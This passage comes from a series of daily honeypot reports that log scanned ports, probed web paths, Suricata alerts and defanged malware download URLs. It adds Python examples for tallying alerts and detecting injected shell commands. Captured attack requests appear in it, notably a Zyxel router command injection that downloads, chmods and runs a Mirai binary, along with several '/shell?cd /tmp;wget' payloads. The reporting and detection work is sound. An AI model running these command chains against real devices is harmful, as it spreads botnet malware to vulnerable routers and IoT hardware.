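    print(summary["by_port"].most_common())
    print(summary["by_host"].most_common())
    print("\n".join(dns_block_rules(summary["by_host"])))
```

Deduplicating before counting matters: the monthly table lists `fid[.]hognoob[.]se/download[.]exe` twice for most source IPs, so raw row counts overstate how many distinct hosts were hit by that campaign.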



That concludes the monthly report.

 

【Honeypot Quick Analysis】Honeypot quick analysis (day 327: 7/12)

This is the Honeypot quick analysis for day 327 (7/12).

◾️Honeytrap
* Port 80 excluded
<Detections by country and detection count>

[Figure: detections by source country and daily detection count (image not reproduced)]


<Detections by port (vs. 30-day average)>
Port Service Count Diff vs. 30-day avg
445 smb 4300 875
23 telnet 1397 161
2323 telnet 286 193
5900 vnc 286 -207
5353 Unknown 117 116
2222 unreg-ab2 78 50
6379 Unknown 56 45
3389 rdp 52 -91
5555 personal-agent 47 16
3306 mysql 46 -116


<New malware downloads>
malware download payload (example)
hxxp:/\/89[.]190[.]159[.]178/lovely GET /shell?cd%20/tmp;wget
hxxp:/\/x[.]autistichorse[.]club/bins/hhh[.]arm7 GET /shell?cd%20/tmp;wget
 

◾️WoWHoneypot
<Detections by country and detection count>

[Figure: detections by source country and daily detection count (image not reproduced)]

<Detected paths>
path target CVE reference count
/ - - - 25
/admin/assets/js/views/login.js FreePBX - https://git.freepbx.org/projects/FREEPBX/repos/framework/browse/amp_conf/htdocs/admin/assets/js/views/login.js?at=bfb36fa7ac70c2e642257dbcd99a1799e19ea743 24
hxxp://110.249.212.46/testget Unauthorized Relay - - 10
/phpmyadmin/index.php phpMyAdmin - - 3
/DA88BAE3EDCA736B157C93CB40964A37.php Webshell - - 1
/dana-na/jam/querymanifest.cgi Unknown - - 1
/dd9a8afc0676f231e6439ecf489f8336.php Webshell - - 1
/index.php - - - 1
/phpMyAdmin/index.php phpMyAdmin - - 1
/robots.txt - - - 1
/web/cgi-bin/hi3510/param.cgi Zivif Web CVE-2017-17106 https://sec-owl.hatenablog.com/entry/2018/09/24/011848 1
hxxp://112.35.63.31:8088/index.php Unauthorized Relay - - 1

<Newly detected paths>
/DA88BAE3EDCA736B157C93CB40964A37.php
→ Webshell
/dana-na/jam/querymanifest.cgi
→ Unknown
/dd9a8afc0676f231e6439ecf489f8336.php
→ Webshell
/phpMyAdmin/index.php
→ phpMyAdmin reconnaissance

<Malware downloads>
None

<Suricata logs (under test)>
alert.category alert.signature count
Not Suspicious Traffic ET INFO Potentially unsafe SMBv1 protocol in use 1306
Generic Protocol Command Decode SURICATA IPv4 padding required 691
Potentially Bad Traffic GPL SCAN loopback traffic 691
Generic Protocol Command Decode SURICATA STREAM ESTABLISHED SYN resend with different seq 275
Generic Protocol Command Decode SURICATA STREAM ESTABLISHED SYNACK resend with different ACK 259
Generic Protocol Command Decode SURICATA STREAM Packet with broken ack 224
Misc activity GPL ICMP_INFO Destination Unreachable Communication with Destination Host is Administratively Prohibited 130
Generic Protocol Command Decode SURICATA STREAM ESTABLISHED invalid ack 124
Generic Protocol Command Decode SURICATA STREAM Packet with invalid ack 124
Generic Protocol Command Decode SURICATA STREAM ESTABLISHED SYNACK resend 103
Generic Protocol Command Decode SURICATA HTTP missing Host header 93
Generic Protocol Command Decode SURICATA STREAM 3way handshake SYN resend different seq on SYN recv 85
Misc activity ET POLICY SSH session in progress on Unusual Port 74
Generic Protocol Command Decode SURICATA Applayer Wrong direction first Data 73
Misc activity ET POLICY SSH Client Banner Detected on Unusual Port 68
Generic Protocol Command Decode SURICATA STREAM 3way handshake SYNACK resend with different ack 65
Generic Protocol Command Decode SURICATA STREAM RST recv but no session 29
Generic Protocol Command Decode SURICATA Applayer Mismatch protocol both directions 17
Generic Protocol Command Decode SURICATA STREAM Packet with invalid timestamp 10
Attempted Administrator Privilege Gain ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 8
Generic Protocol Command Decode SURICATA TCPv4 invalid checksum 8
Generic Protocol Command Decode SURICATA TLS invalid record/traffic 8
Generic Protocol Command Decode SURICATA TLS invalid record type 6
Generic Protocol Command Decode SURICATA SMTP no server welcome message 5
Generic Protocol Command Decode SURICATA STREAM bad window update 4
Generic Protocol Command Decode SURICATA TLS error message encountered 4
Generic Protocol Command Decode SURICATA TLS handshake invalid length 4
Generic Protocol Command Decode SURICATA Applayer Detect protocol only one direction 3
Generic Protocol Command Decode SURICATA STREAM TIMEWAIT ACK with wrong seq 3
Generic Protocol Command Decode SURICATA STREAM 3way handshake wrong seq wrong ack 2
Generic Protocol Command Decode SURICATA STREAM excessive retransmissions 2
Generic Protocol Command Decode SURICATA TLS invalid handshake message 2
Potentially Bad Traffic ET POLICY Inbound RDP Connection with Minimal Security Protocol Requested 2
Executable Code was Detected ET SHELLCODE Adenau Shellcode 1
Generic Protocol Command Decode SURICATA HTTP unable to match response to request 1
Generic Protocol Command Decode SURICATA STREAM FIN out of window 1
Generic Protocol Command Decode SURICATA STREAM FIN recv but no session 1
Generic Protocol Command Decode SURICATA STREAM SYN resend 1
Generic Protocol Command Decode SURICATA UDPv4 invalid checksum 1
Misc activity ET CHAT IRC NICK command 1
Misc activity ET INFO Cisco Smart Install Protocol Observed 1
Potentially Bad Traffic GPL TFTP Get
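The table above is what you get by tallying Suricata's eve.json alerts by category and signature; on a honeypot the engine's own stream/decoder diagnostics (the `SURICATA ...` signatures) swamp the rule hits. The following is an added example, not code from the original post or from the Suricata project: it builds the same table from eve.json lines, separates engine diagnostics from real rule hits, pivots one signature to its source IPs, and lists alerts in which the sensor itself is the source. The eve.json lines are constructed (documentation IP ranges, made-up signature_id values) to mirror signatures that appear in the table above; only the standard library is used.

```python
"""Tally Suricata eve.json alerts and separate engine diagnostics from
rule hits.  Added example, not code from the original post."""
import json
from collections import Counter

# Constructed eve.json lines: RFC 5737 addresses, made-up sids; the
# honeypot is 192.0.2.10.  The last line is a flow record, not an alert.
EVE_SAMPLE = """
{"timestamp":"2019-07-12T01:00:00+0900","event_type":"alert","src_ip":"198.51.100.7","dest_ip":"192.0.2.10","dest_port":445,"proto":"TCP","alert":{"signature_id":9000001,"signature":"ET INFO Potentially unsafe SMBv1 protocol in use","category":"Not Suspicious Traffic","severity":3}}
{"timestamp":"2019-07-12T01:00:01+0900","event_type":"alert","src_ip":"198.51.100.7","dest_ip":"192.0.2.10","dest_port":445,"proto":"TCP","alert":{"signature_id":9000001,"signature":"ET INFO Potentially unsafe SMBv1 protocol in use","category":"Not Suspicious Traffic","severity":3}}
{"timestamp":"2019-07-12T01:00:02+0900","event_type":"alert","src_ip":"203.0.113.5","dest_ip":"192.0.2.10","dest_port":23,"proto":"TCP","alert":{"signature_id":9000002,"signature":"SURICATA STREAM Packet with broken ack","category":"Generic Protocol Command Decode","severity":3}}
{"timestamp":"2019-07-12T01:00:03+0900","event_type":"alert","src_ip":"203.0.113.6","dest_ip":"192.0.2.10","dest_port":23,"proto":"TCP","alert":{"signature_id":9000002,"signature":"SURICATA STREAM Packet with broken ack","category":"Generic Protocol Command Decode","severity":3}}
{"timestamp":"2019-07-12T01:00:04+0900","event_type":"alert","src_ip":"203.0.113.7","dest_ip":"192.0.2.10","dest_port":23,"proto":"TCP","alert":{"signature_id":9000002,"signature":"SURICATA STREAM Packet with broken ack","category":"Generic Protocol Command Decode","severity":3}}
{"timestamp":"2019-07-12T01:00:05+0900","event_type":"alert","src_ip":"192.0.2.10","dest_ip":"198.51.100.9","dest_port":8080,"proto":"TCP","alert":{"signature_id":9000003,"signature":"ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound","category":"Attempted Administrator Privilege Gain","severity":1}}
{"timestamp":"2019-07-12T01:00:06+0900","event_type":"flow","src_ip":"203.0.113.5","dest_ip":"192.0.2.10","dest_port":23,"proto":"TCP"}
"""


def is_engine_event(alert):
    """Suricata's own decoder/stream/app-layer diagnostics carry a
    'SURICATA ' signature prefix; they describe malformed traffic, not a
    matched threat rule."""
    return alert["signature"].startswith("SURICATA ")


def iter_alerts(lines):
    """Yield only event_type == 'alert' records, skipping blank lines."""
    for line in lines:
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        if ev.get("event_type") == "alert":
            yield ev


def count_alerts(lines, include_engine=True):
    """(category, signature) -> count, most common first: the layout of
    the table above.  include_engine=False keeps only rule hits."""
    tally = Counter()
    for ev in iter_alerts(lines):
        a = ev["alert"]
        if include_engine or not is_engine_event(a):
            tally[(a["category"], a["signature"])] += 1
    return tally.most_common()


def sources_for(lines, signature):
    """Pivot one signature to the source IPs that triggered it."""
    return Counter(ev["src_ip"] for ev in iter_alerts(lines)
                   if ev["alert"]["signature"] == signature).most_common()


def outbound_hits(lines, sensor_ip):
    """Alerts where the sensor is the source.  On a honeypot these need a
    look: either the sensor is compromised or HOME_NET is set too broadly
    and 'Outbound' ET rules are firing on attacker traffic."""
    return [ev["alert"]["signature"] for ev in iter_alerts(lines)
            if ev["src_ip"] == sensor_ip]


if __name__ == "__main__":
    lines = EVE_SAMPLE.splitlines()
    for (category, signature), n in count_alerts(lines):
        print(f"{n:6d}  {category}  {signature}")
    print("rule hits only:", count_alerts(lines, include_engine=False))
    print("sensor as source:", outbound_hits(lines, "192.0.2.10"))
```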

That concludes this report.
 

【Honeypot Quick Analysis】Honeypot quick analysis (day 326: 7/11)

This is the Honeypot quick analysis for day 326 (7/11).

◾️Honeytrap
* Port 80 excluded
<Detections by country and detection count>

[Figure: detections by source country and daily detection count (image not reproduced)]

<Detections by port (vs. 30-day average)>
Port Service Count Diff vs. 30-day avg
445 smb 4001 575
23 telnet 1749 533
5900 vnc 611 73
11022 Unknown  233 232
2323 telnet 207 117
8080 proxy 161 129
3306 mysql 91 -76
3389 rdp 78 -75
175 vmnet 72 72
81 hosts2-ns 70 38
<New malware downloads>
malware download payload (example)
hxxp:/\/89[.]190[.]159[.]178/lovely GET /shell?cd%20/tmp;wget
hxxp://fbihere[.]web2tor[.]cf/love POST /UD/?9 HTTP/1.1
142[.]11[.]240[.]29 POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
hxxp://198[.]46[.]202[.]162/kr POST /picsdesc.xml HTTP/1.1
As before, Mirai/Gafgyt-family malware makes up the majority.

◾️WoWHoneypot
<Detections by country and detection count>

[Figure: detections by source country and daily detection count (image not reproduced)]


<Detected paths>
path target CVE reference count
/admin/assets/js/views/login.js FreePBX - https://git.freepbx.org/projects/FREEPBX/repos/framework/browse/amp_conf/htdocs/admin/assets/js/views/login.js?at=bfb36fa7ac70c2e642257dbcd99a1799e19ea743 20
/ - - - 17
hxxp://110[.]249.212.46/testget Unauthorized Relay - - 8
/index.php - - - 3
/phpmyadmin/index.php phpMyAdmin - - 3
/robots.txt - - - 2
/MyAdmin/scripts/setup.php phpMyAdmin - - 1
/manager/html Tomcat - - 1
/myadmin/scripts/setup.php phpMyAdmin - - 1
/phpMyAdmin/scripts/setup.php phpMyAdmin - - 1
/phpmyadmin/scripts/setup.php phpMyAdmin - - 1
/pma/scripts/setup.php phpMyAdmin - - 1
/user/login.html Unknown - - 1
/w00tw00t.at.blackhats.romanian.anti-sec:) phpMyAdmin - - 1
<Newly detected paths>
/myadmin/scripts/setup.php
/phpMyAdmin/scripts/setup.php
/phpmyadmin/scripts/setup.php
/pma/scripts/setup.php
→ All of these appear to be phpMyAdmin reconnaissance.

<Malware downloads>
None
 
<Suricata logs (under test)>
alert.category alert.signature count
Generic Protocol Command Decode SURICATA STREAM Packet with broken ack 2366
Not Suspicious Traffic ET INFO Potentially unsafe SMBv1 protocol in use 1218
Generic Protocol Command Decode SURICATA STREAM 3way handshake SYNACK resend with different ack 1088
Generic Protocol Command Decode SURICATA IPv4 padding required 691
Potentially Bad Traffic GPL SCAN loopback traffic 691
Generic Protocol Command Decode SURICATA STREAM 3way handshake SYN resend different seq on SYN recv 437
Generic Protocol Command Decode SURICATA HTTP missing Host header 190
Generic Protocol Command Decode SURICATA STREAM ESTABLISHED SYNACK resend with different ACK 150
Generic Protocol Command Decode SURICATA STREAM FIN recv but no session 143
Generic Protocol Command Decode SURICATA STREAM ESTABLISHED SYN resend with different seq 136
Misc activity ET POLICY SSH Client Banner Detected on Unusual Port 106
Misc activity ET POLICY SSH session in progress on Unusual Port 104
Misc activity GPL ICMP_INFO Destination Unreachable Communication with Destination Host is Administratively Prohibited 97
Generic Protocol Command Decode SURICATA STREAM Packet with invalid timestamp 85
Generic Protocol Command Decode SURICATA STREAM RST recv but no session 75
Generic Protocol Command Decode SURICATA STREAM Packet with invalid ack 66
Generic Protocol Command Decode SURICATA ICMPv4 unknown code 64
Generic Protocol Command Decode SURICATA STREAM ESTABLISHED invalid ack 64
Generic Protocol Command Decode SURICATA STREAM ESTABLISHED SYNACK resend 55
Generic Protocol Command Decode SURICATA Applayer Detect protocol only one direction 33
Generic Protocol Command Decode SURICATA TLS invalid record type 24
Generic Protocol Command Decode SURICATA TLS invalid record/traffic 24
Generic Protocol Command Decode SURICATA Applayer Mismatch protocol both directions 18
Generic Protocol Command Decode SURICATA TCPv4 invalid checksum 16
Generic Protocol Command Decode SURICATA zero length padN option 16
Generic Protocol Command Decode SURICATA STREAM FIN out of window 8
Generic Protocol Command Decode SURICATA STREAM TIMEWAIT ACK with wrong seq 8
Generic Protocol Command Decode SURICATA SMTP no server welcome message 7
Generic Protocol Command Decode SURICATA STREAM 3way handshake SYNACK with wrong ack 6
Potentially Bad Traffic ET POLICY Tunneled RDP msts Handshake 6
Generic Protocol Command Decode SURICATA TCP option invalid length 5
Generic Protocol Command Decode SURICATA Applayer Wrong direction first Data 4
Generic Protocol Command Decode SURICATA STREAM 3way handshake wrong seq wrong ack 4
Generic Protocol Command Decode SURICATA STREAM excessive retransmissions 4
Generic Protocol Command Decode SURICATA TLS error message encountered 4
Generic Protocol Command Decode SURICATA TLS handshake invalid length 4
Attempted Administrator Privilege Gain ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 2
Generic Protocol Command Decode SURICATA HTTP unable to match response to request 2
Generic Protocol Command Decode SURICATA STREAM SHUTDOWN RST invalid ack 2
Generic Protocol Command Decode SURICATA STREAM bad window update 2
Misc activity ET INFO Cisco Smart Install Protocol Observed 2
Generic Protocol Command Decode SURICATA HTTP Host header invalid 1
Generic Protocol Command Decode SURICATA STREAM Last ACK with wrong seq 1

That concludes this report.

【Honeypot Quick Analysis】Honeypot quick analysis (day 326: 7/10)

This is the Honeypot quick analysis for day 326 (7/10).

◾️Honeytrap
* Port 80 excluded
<Detections by country and detection count>

[Figure: detections by source country and daily detection count (image not reproduced)]

<Detections by port (vs. 30-day average)>
Port Service Count Diff vs. 30-day avg
445 smb 4307 883
23 telnet 913 -314
5900 vnc 617 -310
2323 telnet 223 138
3389 rdp 75 -91
28017 Unknown  74 73
3307 opsession-prxy 67 19
1521 ncube-lm 55 52
443 https 44 2
111 sunrpc 42 33
<New malware downloads>
None

◾️WoWHoneypot
<Detections by country and detection count>

[Figure: detections by source country and daily detection count (image not reproduced)]

<Detected paths>
wow_path_research target CVE reference count
/ - - - 30
/admin/assets/js/views/login.js FreePBX - https://git.freepbx.org/projects/FREEPBX/repos/framework/browse/amp_conf/htdocs/admin/assets/js/views/login.js?at=bfb36fa7ac70c2e642257dbcd99a1799e19ea743 19
hxxp://110.249.212.46/testget Unauthorized Relay - - 14
/TP/public/index.php ThinkPHP - - 3
/.svn/entries - - - 1
/ipc$ IPC - https://thinline196.hatenablog.com/entry/2018/09/23/153019 1
/mysql/admin/index.php PhpMyAdmin - - 1
/webadmin/script - - - 1
hxxp://172.247.32.25/ddd.html Unauthorized Relay - - 1
<Newly detected paths>
None
<Malware downloads>
None
 
That concludes this report.

【Honeypot Quick Analysis】Honeypot quick analysis (day 325: 7/9)

This is the Honeypot quick analysis for day 325 (7/9).

◾️Honeytrap
* Port 80 excluded
<Detections by country and detection count>

[Figure: detections by source country and daily detection count (image not reproduced)]

<Detections by port (vs. 30-day average)>
Port Service Count Diff vs. 30-day avg
445 smb 4403 917
23 telnet 868 -423
5900 vnc 423 -1736
502 asa-appl-proto 256 242
9200 Unknown 250 240
3306 mysql 215 37
3389 rdp 84 -100
3307 opsession-prxy 82 36
5000 commplex-main 75 70
1962 Unknown 69 67
<New malware downloads>

malware download payload
103[.]83[.]157[.]46 POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
hxxp://116[.]206[.]177[.]144:93/xlk\ GET /_search?
hxxp://116[.]206[.]177[.]144:93/Down[.]exe GET /_search?
hxxp://116[.]206[.]177[.]144:93/xlk GET /_search?

Several attacks targeting the Elasticsearch vulnerability CVE-2014-3120 (remote code execution through dynamic scripting, reached via the /_search endpoint seen in the payload) were detected.
They are presumed to end by downloading cryptocurrency-miner malware.

◾️WoWHoneypot
<Detections by country and detection count>

[Figure: detections by source country and daily detection count (image not reproduced)]

<Detected paths>
wow_path_research target CVE reference count
/ - - - 32
/admin/assets/js/views/login.js FreePBX - https://git.freepbx.org/projects/FREEPBX/repos/framework/browse/amp_conf/htdocs/admin/assets/js/views/login.js?at=bfb36fa7ac70c2e642257dbcd99a1799e19ea743 19
/cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup Zyxel CVE-2017-6884 https://www.exploit-db.com/exploits/41782 2
/index.php - - - 1
/mysql/admin/index.php PhpMyAdmin - - 1
/phpmyadmin/index.php phpMyAdmin - - 1
/robots.txt - - - 1
hxxp://110[.]249.212.46/testget Unauthorized Relay - - 4
<Newly detected paths>
/cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup
→ Targets a command-injection vulnerability in Zyxel routers (CVE-2017-6884); the decoded request is shown under Malware downloads below.
https://www.exploit-db.com/exploits/41782

<Malware downloads>
malware_wowhoneypot_report wow_path base64_wow_decrypted_report count
hxxp://134[.]209[.]230[.]124/bins/tron[.]mips /cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup GET /cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%20%3B%20cd%20tmp;wget%20hxxp://xxx.xxx.xxx.xxx/bins/tron.mips;chmod%20777%20tron.mips;./tron.mips%20zyxelv2 HTTP/1.1.Host: xxx.xxx.xxx.xxx.Connection: keep-alive.Accept-Encoding: gzip, deflate.Accept: */*.User-Agent: python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.17.1.el6.x86_64.. 1
hxxp://134[.]209[.]230[.]124/bins/tron[.]mpsl /cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup GET /cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%20%3B%20cd%20tmp;wget%20hxxp://xxx.xxx.xxx.xxx/bins/tron.mpsl;chmod%20777%20tron.mpsl;./tron.mpsl%20zyxelv2 HTTP/1.1.Host: xxx.xxx.xxx.xxx.Connection: keep-alive.Accept-Encoding: gzip, deflate.Accept: */*.User-Agent: python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.17.1.el6.x86_64..
This attack exploits the Zyxel router vulnerability to infect the device with Mirai: the injected command string changes to a writable directory, fetches the MIPS binary with wget, marks it executable, and runs it.
https://www.virustotal.com/gui/file/50416814e217eb2d04a8b8431ef62e7bb54a57b51794bff235ff791ead0d3e37/detection
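The decoded Zyxel request above, and the `/shell?cd%20/tmp;wget` payloads in the daily "new malware downloads" tables, share one pattern: a shell command chain smuggled into a parameter or query string, ending in a download and execution. The following is an added example, not code from the original post: it decodes a request line, attributes the injection to the parameter that carries it, extracts the download URLs, and flags execution of the dropped file. It also recognises absolute-URI targets (the page's "Unauthorized Relay" category). The request lines are constructed from payloads shown on this page; the `/shell` line is extended with a plausible wget/sh tail and is not a verbatim capture, hosts stay defanged exactly as logged, and the command list is a heuristic that you would extend from your own logs.

```python
"""Decode honeypot HTTP request lines and flag shell-command injection.
Added example, not code from the original post; standard library only."""
import re
from urllib.parse import unquote

# A shell command right after a metacharacter (or at the start of a bare
# query string) is the tell-tale of command chaining in an input field.
_CMD = re.compile(r"(?:^|[;|&`$(]|\|\||&&)\s*(cd|wget|curl|tftp|ftpget|chmod|sh|busybox|rm)\b")
# Running a file that was just dropped, e.g. ";./tron.mips zyxelv2"
_EXEC_DROPPED = re.compile(r"[;|&]\s*\./[\w.-]+")
# Download locations, including the defanged hxxp:// form used in this log
_URL = re.compile(r"(?:https?|hxxps?|ftp|tftp)://[^\s;&'\"|]+")

# Constructed request lines (see the lead-in for what is verbatim).
ZYXEL = ("GET /cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup"
         "?nslookup_button=nslookup_button&ping_ip=google.ca%20%3B%20cd%20tmp;"
         "wget%20hxxp://xxx.xxx.xxx.xxx/bins/tron.mips;chmod%20777%20tron.mips;"
         "./tron.mips%20zyxelv2 HTTP/1.1")
JAWS = "GET /shell?cd%20/tmp;wget%20hxxp://89.190.159.178/lovely;sh%20lovely HTTP/1.1"
RELAY = "GET hxxp://110.249.212.46/testget HTTP/1.1"
BENIGN = "GET /admin/assets/js/views/login.js HTTP/1.1"


def _scan(fragment):
    """Commands, download URLs and dropped-file execution in one decoded piece."""
    cmds = [m.group(1) for m in _CMD.finditer(fragment)]
    return cmds, _URL.findall(fragment), bool(_EXEC_DROPPED.search(fragment))


def analyze(request_line):
    """Classify one request line ('METHOD target HTTP/x.y')."""
    parts = request_line.split()
    if len(parts) < 2:
        return {"verdict": "malformed"}
    target = parts[1]
    if re.match(r"[a-z]+://", target, re.I):
        # Absolute URI as target: the sender is probing for an open proxy.
        return {"verdict": "proxy-relay-attempt", "path": target,
                "injected_params": [], "commands": [], "urls": [target],
                "runs_dropped_file": False}

    path, _, query = target.partition("?")
    commands, urls, params, runs_dropped = [], [], [], False

    # The path itself can carry injection.  LuCI's ';stok=' is benign, which
    # is why the check keys on command names rather than on ';' alone.
    c, u, d = _scan(unquote(path))
    commands += c; urls += u; runs_dropped |= d

    # Split on '&' only: inside a payload, ';' is part of the injection.
    for pair in query.split("&") if query else []:
        raw_key, _, raw_val = pair.partition("=")
        key, val = unquote(raw_key), unquote(raw_val)
        # Attribute to a named parameter's value first, then to a bare query
        # (JAWS-style '/shell?cd /tmp;wget ...' has no key=value at all).
        for label, text in ((key, val), ("(bare query)", key)):
            c, u, d = _scan(text)
            if c or u or d:
                params.append(label)
                commands += c; urls += u; runs_dropped |= d

    verdict = "command-injection" if (commands or runs_dropped) else "clean"
    return {"verdict": verdict, "path": unquote(path),
            "injected_params": params,
            "commands": list(dict.fromkeys(commands)),
            "urls": list(dict.fromkeys(urls)),
            "runs_dropped_file": runs_dropped}


if __name__ == "__main__":
    for line in (ZYXEL, JAWS, RELAY, BENIGN):
        print(analyze(line))
```

For the Zyxel request the result names `ping_ip` as the injected parameter and lists `cd`, `wget`, `chmod` plus the `./tron.mips` execution, which is exactly the kill chain the page describes; the benign FreePBX path, which also contains slashes and dots, stays clean because no command name follows a metacharacter.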

That concludes this report.



【Honeypot Quick Analysis】Honeypot quick analysis (day 324: 7/8)

This is the Honeypot quick analysis for day 324 (7/8).

◾️Honeytrap
* Port 80 excluded
<Detections by country and detection count>

[Figure: detections by source country and daily detection count (image not reproduced)]

<Detections by port (vs. 30-day average)>
Port Service Count Diff vs. 30-day avg
445 smb 4821 1380
23 telnet 1100 -182
25 smtp 681 584
5900 vnc 606 -2055
3306 mysql 266 96
1433 ms-sql-s 242 201
2323 telnet 240 159
3389 rdp 115 -77
47808 bacnet 68 64
81 hosts2-ns 57 26

<New malware downloads>
None

◾️WoWHoneypot
<Detections by country and detection count>

[Figure: detections by source country and daily detection count (image not reproduced)]

<Detected paths>
wow_path_research target CVE reference count
/ - - - 28
/admin/assets/js/views/login.js FreePBX - https://git.freepbx.org/projects/FREEPBX/repos/framework/browse/amp_conf/htdocs/admin/assets/js/views/login.js?at=bfb36fa7ac70c2e642257dbcd99a1799e19ea743 19
hxxp://110[.]249.212.46/testget Unauthorized Relay - - 13
/TP/public/index.php ThinkPHP - - 3
/phpmyadmin/ phpMyAdmin - - 1
hxxp://112[.]124.42.80:63435/ Unauthorized Relay - - 1
 
<Newly detected paths>
None

<Malware downloads>
None
 
That concludes this report.

【Honeypot Quick Analysis】Honeypot quick analysis (day 323: 7/7)

This is the Honeypot quick analysis for day 323 (7/7).

◾️Honeytrap
* Port 80 excluded
<Detections by country and detection count>

[Figure: detections by source country and daily detection count (image not reproduced)]

<Detections by port (vs. 30-day average)>
Port Service Count Diff vs. 30-day avg
445 smb 3192 -261
23 telnet 2690 1185
25 smtp 880 794
5900 vnc 533 -2481
3306 mysql 359 190
503 intrinsa 256 252
3389 rdp 112 -88
2323 telnet 96 9
1200 Unknown  69 68
34567 Unknown 69 61

<New malware downloads>
malware download payload (example)
fxp://45[.]76[.]66[.]122/160[.]16[.]145[.]183[.]conf G7.`......copy system:running-config 
hxxp://87[.]120[.]254[.]184/sh/adb_bb_curl[.]sh CNXN............M
hxxp:/\/103[.]83[.]157[.]46/arm7 GET /shell

◾️WoWHoneypot
<Detections by country and detection count>

[Figure: detections by source country and daily detection count (image not reproduced)]

<Detected paths>
path target CVE reference count
/ - - - 256
/admin/assets/js/views/login.js FreePBX - https://git.freepbx.org/projects/FREEPBX/repos/framework/browse/amp_conf/htdocs/admin/assets/js/views/login.js?at=bfb36fa7ac70c2e642257dbcd99a1799e19ea743 152
/manager/html Tomcat - - 16
hxxp://110.249.212.46/testget Unauthorized Relay - - 9
/favicon.ico - - - 8
/robots.txt - - - 8
/index.php - - - 3
/phpmyadmin/index.php phpMyAdmin - - 3
/HNAP1/ D-Link DIR-850L CVE-2015-2051 https://www.morihi-soc.net/?p=981 1
<Newly detected paths>
None detected

<Malware downloads>
None detected
 
That concludes this report.